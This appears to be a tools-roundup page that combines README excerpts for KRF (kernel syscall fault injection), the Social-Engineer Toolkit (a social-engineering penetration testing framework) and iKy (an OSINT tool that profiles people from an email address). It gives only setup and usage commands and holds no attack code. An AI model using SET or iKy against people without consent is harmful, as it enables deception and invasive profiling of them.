KRF rewrites the Linux or FreeBSD system call table: when configured via krfctl, KRF replaces faultable syscalls with thin wrappers. Each wrapper then checks whether the call should be faulted, using a configurable targeting system capable of targeting a specific personality(2), PID, UID, and/or GID. If the process shouldn't be faulted, the original syscall is invoked. Otherwise, the targeted call is faulted via a random failure function. For example, a read(2) call might receive one of EBADF, EINTR, EIO, and so on.

Setup

Compatibility

NOTE: If you have Vagrant, just use the Vagrantfile and jump to the build steps.

KRF should work on any recent-ish (4.15+) Linux kernel with CONFIG_KALLSYMS=1. This includes the default kernel on Ubuntu 18.04 and probably many other recent distros.

Dependencies

NOTE: Ignore this if you're using Vagrant.

Apart from a C toolchain (GCC is probably necessary for Linux), KRF's only dependencies should be libelf, the kernel headers, and Ruby (for code generation). GNU Make is required on all platforms; FreeBSD additionally requires BSD Make.

For systems with apt:

    sudo apt install libelf-dev ruby linux-headers-$(uname -r)

Building

    git clone https://github.com/trailofbits/krf && cd krf
    make -j$(nproc)

or, if you're using Vagrant:

    git clone https://github.com/trailofbits/krf && cd krf
    vagrant up linux && vagrant ssh linux
    # inside the VM
    cd /vagrant
    make -j$(nproc)

or, for FreeBSD:

    git clone https://github.com/trailofbits/krf && cd krf
    vagrant up freebsd && vagrant ssh freebsd
    # inside the VM
    cd /vagrant
    gmake # NOT make!

Usage

KRF has three components:

- A kernel module (krfx)
- An execution utility (krfexec)
- A control utility (krfctl)

To load the kernel module, run make insmod. To unload it, run make rmmod.

KRF begins in a neutral state: no syscalls will be intercepted or faulted until the user specifies some behavior via krfctl:

    # no induced faults, even with KRF loaded
    ls

    # tell krf to fault read(2) and write(2) calls
    # note that krfctl requires root privileges
    sudo ./src/krfctl/krfctl -F 'read,write'

    # tell krf to fault any program with a personality of 28 (the value set by krfexec)
    sudo ./src/krfctl/krfctl -T personality=28

    # may fault!
    ./src/krfexec/krfexec ls

    # krfexec will pass options correctly as well
    ./src/krfexec/krfexec echo -n 'no newline'

    # clear the fault specification
    sudo ./src/krfctl/krfctl -c

    # clear the targeting specification
    sudo ./src/krfctl/krfctl -C

    # no induced faults, since no syscalls are being faulted
    ./src/krfexec/krfexec firefox

On FreeBSD, krfexec requires root privileges. By default, it will attempt to use SUDO_UID and the username returned by getlogin_r to return to a non-root user before executing the target. To force a particular UID, export REAL_UID, e.g.:

    REAL_UID=1000 sudo ./src/krfexec/krfexec ls

Configuration

NOTE: Most users should use krfctl instead of manipulating these files by hand.

On FreeBSD, the same values are accessible through sysctl krf.whatever instead of procfs.

/proc/krf/rng_state

This file allows a user to read and modify the internal state of KRF's PRNG. For example, each of the following will correctly update the state:

    echo "1234" | sudo tee /proc/krf/rng_state
    echo "0777" | sudo tee /proc/krf/rng_state
    echo "0xFF" | sudo tee /proc/krf/rng_state

The state is a 32-bit unsigned integer; attempting to change it beyond that will fail.

/proc/krf/targeting

This file allows a user to set the values used by KRF for syscall targeting.

NOTE: By default, KRF uses a personality not currently used by the Linux kernel. If you change this, be careful to avoid making it something that Linux cares about; man 2 personality has the details.

    echo "0 28" | sudo tee /proc/krf/targeting

A personality of 28 is hardcoded into krfexec.

/proc/krf/probability

This file allows a user to read and write the probability of inducing a fault for a given (faultable) syscall. The probability is represented as a reciprocal, e.g. 1000 means that, on average, 0.1% of faultable syscalls will be faulted.

    echo "100000" | sudo tee /proc/krf/probability

/proc/krf/control

This file controls the syscalls that KRF faults.

NOTE: Most users should use krfctl instead of interacting with this file directly; krfctl performs the syscall name-to-number translation automatically and gives clearer error messages when things go wrong.

    # replace the syscall in slot 0 (usually SYS_read) with its faulty wrapper
    echo "0" | sudo tee /proc/krf/control

Passing any number greater than KRF_NR_SYSCALLS will cause KRF to flush the entire syscall table, returning it to the neutral state. Since KRF_NR_SYSCALLS isn't necessarily predictable for arbitrary versions of the Linux kernel, choosing a large number (like 65535) is fine.

Passing a valid syscall number that lacks a fault injection wrapper will cause the write(2) to the file to fail with EOPNOTSUPP.

/proc/krf/log_faults

This file controls whether or not KRF emits kernel logs on faulted syscalls. By default, no logging messages are emitted.

NOTE: Most users should use krfctl instead of interacting with this file directly.

    # enable fault logging
    echo "1" | sudo tee /proc/krf/log_faults
    # disable fault logging
    echo "0" | sudo tee /proc/krf/log_faults
    # read the logging state
    cat /proc/krf/log_faults

Download Krf

Copyright 2019 The Social-Engineer Toolkit (SET)
Written by: David Kennedy (ReL1K)
Company: TrustedSec

DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period.

Please read the LICENSE under readme/LICENSE for the licensing of SET.

SET Tutorial

For a full document on how to use SET, visit the SET user manual.

Features

The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC, an information security consulting firm located in Cleveland, Ohio.

Bugs and enhancements

For bug reports or enhancements, please open an issue here.

Supported platforms

- Linux
- Mac OS X

Installation

Resolve dependencies:

- Ubuntu/Debian System
- Linux
- Mac OS X (experimental)

Install via requirements.txt:

    $ pip install -r requirements.txt

Install SET (All OSs):

    $ git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
    $ cd set
    $ pip install -r requirements.txt

Download Social-Engineer-Toolkit

Project iKy is a tool that collects information from an email and shows results in a nice visual interface.

Visit the Gitlab Page of the Project

Video

Installation

Clone repository:

    git clone https://gitlab.com/kennbroorg/iKy.git

Install Backend

Redis

You must install Redis:

    wget http://download.redis.io/redis-stable.tar.gz
    tar xvzf redis-stable.tar.gz
    cd redis-stable
    make
    sudo make install

And turn on the server in a terminal:

    redis-server

Python stuff and Celery

You must install the libraries inside requirements.txt:

    pip install -r requirements.txt

And turn on Celery in another terminal, within the directory backend:

    ./celery.sh

Finally, again in another terminal, turn on the backend app from the directory backend:

    python app.py

Install Frontend

Node

First of all, install nodejs.

Dependencies

Inside the directory frontend, install the dependencies:

    npm install

Turn on Frontend Server

Finally, to run the frontend server, execute:

    npm start

Browser

Open the browser in this url

Config API Keys

Once the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed.

- Fullcontact: Generate the APIs from here
- Twitter: Generate the APIs from here
- Linkedin: Only the user and password of your account must be loaded

Disclaimer

Anyone who contributes or contributed to the project, including me, is not responsible for the use of the tool (neither the legal use nor the illegal use, nor the "other" use).

Keep in mind that this software was initially written for a joke, then for educational purposes (to educate ourselves), and now the goal is to collaborate with the community making quality free software, and while the quality is not excellent (sometimes not even good) we strive to pursue excellence.

Consider that all the information collected is free and available online; the tool only tries to discover, collect and display it. Many times the tool cannot even achieve its goal of discovery and collection.

Please load the necessary APIs before remembering my mother. If even with the APIs it doesn't show the "nice" things that you expect to see, try other e-mails before you remember my mother. If you still do not see the "nice" things you expect to see, you can create an issue, contact us by e-mail or by any of the RRSS, but keep in mind that my mother is neither the creator of nor a contributor to the project.

We do not refund your money if you are not satisfied.

I hope you enjoy using the tool as much as we enjoy making it. The effort was and is enormous (time, knowledge, coding, tests, reviews, etc.) but we would do it again.

Do not use the tool if you cannot read the instructions and/or this disclaimer clearly.

By the way, for those who insist on remembering my mother, she died many years ago but I love her as if she were right here.

Download Project iKy v2.1.0